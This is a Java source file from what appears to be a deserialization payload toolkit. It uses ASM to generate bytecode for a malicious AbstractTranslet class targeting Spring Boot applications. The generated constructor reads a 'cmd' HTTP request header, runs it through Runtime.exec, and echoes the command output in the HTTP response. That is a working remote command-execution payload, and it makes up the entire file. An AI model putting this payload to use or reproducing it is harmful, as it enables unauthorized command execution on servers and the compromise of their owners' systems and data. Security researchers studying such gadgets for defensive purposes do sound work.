package yso.payloads.exploitType;


import org.objectweb.asm.*;
import yso.payloads.annotation.Authors;
import yso.payloads.annotation.Dependencies;

@Authors({ Authors.POTATSO })
@Dependencies({ "springboot:springboot:all" })
public class SpringBootEcho1 implements Opcodes, EXP {

    public static byte[] dump() throws Exception {

        ClassWriter cw = new ClassWriter(0);
        FieldVisitor fv;
        MethodVisitor mv;
        AnnotationVisitor av0;

        cw.visit(V1_7, ACC_PUBLIC + ACC_SUPER, "spring", null, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", null);

        cw.visitSource("spring.java", null);

        {
            mv = cw.visitMethod(ACC_PUBLIC, "<init>", "()V", null, null);
            mv.visitCode();
            Label l0 = new Label();
            Label l1 = new Label();
            Label l2 = new Label();
            mv.visitTryCatchBlock(l0, l1, l2, "java/lang/Exception");
            Label l3 = new Label();
            mv.visitLabel(l3);
            mv.visitLineNumber(15, l3);
            mv.visitVarInsn(ALOAD, 0);
            mv.visitMethodInsn(INVOKESPECIAL, "com/sun/org/apache/xalan/internal/xsltc/runtime/AbstractTranslet", "<init>", "()V", false);
            mv.visitLabel(l0);
            mv.visitLineNumber(17, l0);
            mv.visitMethodInsn(INVOKESTATIC, "org/springframework/web/context/request/RequestContextHolder", "getRequestAttributes", "()Lorg/springframework/web/context/request/RequestAttributes;", false);
            mv.visitTypeInsn(CHECKCAST, "org/springframework/web/context/request/ServletRequestAttributes");
            mv.visitMethodInsn(INVOKEVIRTUAL, "org/springframework/web/context/request/ServletRequestAttributes", "getRequest", "()Ljavax/servlet/http/HttpServletRequest;", false);
            mv.visitVarInsn(ASTORE, 1);
            Label l4 = new Label();
            mv.visitLabel(l4);
            mv.visitLineNumber(18, l4);
            mv.visitMethodInsn(INVOKESTATIC, "org/springframework/web/context/request/RequestContextHolder", "getRequestAttributes", "()Lorg/springframework/web/context/request/RequestAttributes;", false);
            mv.visitTypeInsn(CHECKCAST, "org/springframework/web/context/request/ServletRequestAttributes");
            mv.visitMethodInsn(INVOKEVIRTUAL, "org/springframework/web/context/request/ServletRequestAttributes", "getResponse", "()Ljavax/servlet/http/HttpServletResponse;", false);
            mv.visitVarInsn(ASTORE, 2);
            Label l5 = new Label();
            mv.visitLabel(l5);
            mv.visitLineNumber(19, l5);
            mv.visitVarInsn(ALOAD, 1);
            mv.visitLdcInsn("cmd");
            mv.visitMethodInsn(INVOKEINTERFACE, "javax/servlet/http/HttpServletRequest", "getHeader", "(Ljava/lang/String;)Ljava/lang/String;", true);
            mv.visitVarInsn(ASTORE, 3);
            Label l6 = new Label();
            mv.visitLabel(l6);
            mv.visitLineNumber(20, l6);
            mv.visitMethodInsn(INVOKESTATIC, "java/lang/Runtime", "getRuntime", "()Ljava/lang/Runtime;", false);
            mv.visitVarInsn(ALOAD, 3);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Runtime", "exec", "(Ljava/lang/String;)Ljava/lang/Process;", false);
            mv.visitVarInsn(ASTORE, 4);
            Label l7 = new Label();
            mv.visitLabel(l7);
            mv.visitLineNumber(21, l7);
            mv.visitTypeInsn(NEW, "java/io/BufferedReader");
            mv.visitInsn(DUP);
            mv.visitTypeInsn(NEW, "java/io/InputStreamReader");
            mv.visitInsn(DUP);
            mv.visitVarInsn(ALOAD, 4);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Process", "getInputStream", "()Ljava/io/InputStream;", false);
            mv.visitMethodInsn(INVOKESPECIAL, "java/io/InputStreamReader", "<init>", "(Ljava/io/InputStream;)V", false);
            mv.visitMethodInsn(INVOKESPECIAL, "java/io/BufferedReader", "<init>", "(Ljava/io/Reader;)V", false);
            mv.visitVarInsn(ASTORE, 5);
            Label l8 = new Label();
            mv.visitLabel(l8);
            mv.visitLineNumber(22, l8);
            mv.visitTypeInsn(NEW, "java/lang/StringBuffer");
            mv.visitInsn(DUP);
            mv.visitMethodInsn(INVOKESPECIAL, "java/lang/StringBuffer", "<init>", "()V", false);
            mv.visitVarInsn(ASTORE, 6);
            Label l9 = new Label();
            mv.visitLabel(l9);
            mv.visitLineNumber(24, l9);
            mv.visitFrame(Opcodes.F_FULL, 7, new Object[]{"spring", "javax/servlet/http/HttpServletRequest", "javax/servlet/http/HttpServletResponse", "java/lang/String", "java/lang/Process", "java/io/BufferedReader", "java/lang/StringBuffer"}, 0, new Object[]{});
            mv.visitVarInsn(ALOAD, 5);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/BufferedReader", "readLine", "()Ljava/lang/String;", false);
            mv.visitInsn(DUP);
            mv.visitVarInsn(ASTORE, 7);
            Label l10 = new Label();
            mv.visitLabel(l10);
            Label l11 = new Label();
            mv.visitJumpInsn(IFNULL, l11);
            Label l12 = new Label();
            mv.visitLabel(l12);
            mv.visitLineNumber(25, l12);
            mv.visitVarInsn(ALOAD, 6);
            mv.visitVarInsn(ALOAD, 7);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuffer", "append", "(Ljava/lang/String;)Ljava/lang/StringBuffer;", false);
            mv.visitLdcInsn("\n");
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuffer", "append", "(Ljava/lang/String;)Ljava/lang/StringBuffer;", false);
            mv.visitInsn(POP);
            mv.visitJumpInsn(GOTO, l9);
            mv.visitLabel(l11);
            mv.visitLineNumber(27, l11);
            mv.visitFrame(Opcodes.F_APPEND, 1, new Object[]{"java/lang/String"}, 0, null);
            mv.visitVarInsn(ALOAD, 6);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/StringBuffer", "toString", "()Ljava/lang/String;", false);
            mv.visitVarInsn(ASTORE, 8);
            Label l13 = new Label();
            mv.visitLabel(l13);
            mv.visitLineNumber(28, l13);
            mv.visitTypeInsn(NEW, "java/io/PrintWriter");
            mv.visitInsn(DUP);
            mv.visitVarInsn(ALOAD, 2);
            mv.visitMethodInsn(INVOKEINTERFACE, "javax/servlet/http/HttpServletResponse", "getOutputStream", "()Ljavax/servlet/ServletOutputStream;", true);
            mv.visitMethodInsn(INVOKESPECIAL, "java/io/PrintWriter", "<init>", "(Ljava/io/OutputStream;)V", false);
            mv.visitVarInsn(ASTORE, 9);
            Label l14 = new Label();
            mv.visitLabel(l14);
            mv.visitLineNumber(29, l14);
            mv.visitVarInsn(ALOAD, 9);
            mv.visitVarInsn(ALOAD, 8);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/PrintWriter", "write", "(Ljava/lang/String;)V", false);
            Label l15 = new Label();
            mv.visitLabel(l15);
            mv.visitLineNumber(30, l15);
            mv.visitVarInsn(ALOAD, 9);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/PrintWriter", "flush", "()V", false);
            Label l16 = new Label();
            mv.visitLabel(l16);
            mv.visitLineNumber(31, l16);
            mv.visitVarInsn(ALOAD, 9);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/io/PrintWriter", "close", "()V", false);
            mv.visitLabel(l1);
            mv.visitLineNumber(34, l1);
            Label l17 = new Label();
            mv.visitJumpInsn(GOTO, l17);
            mv.visitLabel(l2);
            mv.visitLineNumber(32, l2);
            mv.visitFrame(Opcodes.F_FULL, 1, new Object[]{"spring"}, 1, new Object[]{"java/lang/Exception"});
            mv.visitVarInsn(ASTORE, 1);
            Label l18 = new Label();
            mv.visitLabel(l18);
            mv.visitLineNumber(33, l18);
            mv.visitVarInsn(ALOAD, 1);
            mv.visitMethodInsn(INVOKEVIRTUAL, "java/lang/Exception", "printStackTrace", "()V", false);
            mv.visitLabel(l17);
            mv.visitLineNumber(35, l17);
            mv.visitFrame(Opcodes.F_SAME, 0, null, 0, null);
            mv.visitInsn(RETURN);
            Label l19 = new Label();
            mv.visitLabel(l19);
            mv.visitLocalVariable("req", "Ljavax/servlet/http/HttpServletRequest;", null, l4, l1, 1);
            mv.visitLocalVariable("rsp", "Ljavax/servlet/http/HttpServletResponse;", null, l5, l1, 2);
            mv.visitLocalVariable("cmd", "Ljava/lang/String;", null, l6, l1, 3);
            mv.visitLocalVariable("proc", "Ljava/lang/Process;", null, l7, l1, 4);
            mv.visitLocalVariable("br", "Ljava/io/BufferedReader;", null, l8, l1, 5);
            mv.visitLocalVariable("sb", "Ljava/lang/StringBuffer;", null, l9, l1, 6);
            mv.visitLocalVariable("line", "Ljava/lang/String;", null, l10, l1, 7);
            mv.visitLocalVariable("result", "Ljava/lang/String;", null, l13, l1, 8);
            mv.visitLocalVariable("out", "Ljava/io/PrintWriter;", null, l14, l1, 9);
            mv.visitLocalVariable("e", "Ljava/lang/Exception;", null, l18, l17, 1);
            mv.visitLocalVariable("this", "Lspring;", null, l3, l19, 0);
            mv.visitMaxs(5, 10);
            mv.visitEnd();
        }
        {
            mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[]{"com/sun/org/apache/xalan/internal/xsltc/TransletException"});
            mv.visitCode();
            Label l0 = new Label();
            mv.visitLabel(l0);
            mv.visitLineNumber(39, l0);
            mv.visitInsn(RETURN);
            Label l1 = new Label();
            mv.visitLabel(l1);
            mv.visitLocalVariable("this", "Lspring;", null, l0, l1, 0);
            mv.visitLocalVariable("document", "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;", null, l0, l1, 1);
            mv.visitLocalVariable("handlers", "[Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;", null, l0, l1, 2);
            mv.visitMaxs(0, 3);
            mv.visitEnd();
        }
        {
            mv = cw.visitMethod(ACC_PUBLIC, "transform", "(Lcom/sun/org/apache/xalan/internal/xsltc/DOM;Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;)V", null, new String[]{"com/sun/org/apache/xalan/internal/xsltc/TransletException"});
            mv.visitCode();
            Label l0 = new Label();
            mv.visitLabel(l0);
            mv.visitLineNumber(44, l0);
            mv.visitInsn(RETURN);
            Label l1 = new Label();
            mv.visitLabel(l1);
            mv.visitLocalVariable("this", "Lspring;", null, l0, l1, 0);
            mv.visitLocalVariable("document", "Lcom/sun/org/apache/xalan/internal/xsltc/DOM;", null, l0, l1, 1);
            mv.visitLocalVariable("iterator", "Lcom/sun/org/apache/xml/internal/dtm/DTMAxisIterator;", null, l0, l1, 2);
            mv.visitLocalVariable("handler", "Lcom/sun/org/apache/xml/internal/serializer/SerializationHandler;", null, l0, l1, 3);
            mv.visitMaxs(0, 4);
            mv.visitEnd();
        }
        cw.visitEnd();

        return cw.toByteArray();
    }

    public Object getObject() throws Exception {
        return dump();
    }
}
